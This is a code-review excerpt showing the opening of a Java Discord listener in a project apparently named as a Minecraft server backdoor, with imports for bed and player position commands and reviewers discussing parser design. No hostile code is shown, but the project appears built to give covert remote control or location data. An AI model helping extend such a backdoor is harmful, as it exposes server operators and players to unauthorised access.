backdoor-1.17/src/main/java/me/tsb/discordBot/PrefixListner.java

```diff
@@ -0,0 +1,35 @@
+package me.tsb.discordBot;
+
+import me.tsb.discordBot.commands.*;
+import me.tsb.discordBot.commands.BedPosition;
+import me.tsb.discordBot.commands.HelpCommand;
+import me.tsb.discordBot.commands.PlayerPosition;
+import net.dv8tion.jda.api.events.message.MessageReceivedEvent;
+import net.dv8tion.jda.api.hooks.ListenerAdapter;
+
+public class PrefixListner extends ListenerAdapter {
+
+    @Override
+    public void onMessageReceived(MessageReceivedEvent event) {
+        String[] args = event.getMessage().getContentRaw().toLowerCase().split(" ");
```

Comment:
All of this should probably be piped to the command manager instead of having 2 parsers

Reply:
idk how that would work cause it is paper commands and jda commands, but ill check

Reply:
i mean the plugin's command manager, you would need to add a boolean for if the message comes from discord because otherwise you would need to always type the prefix and somehow check the perms?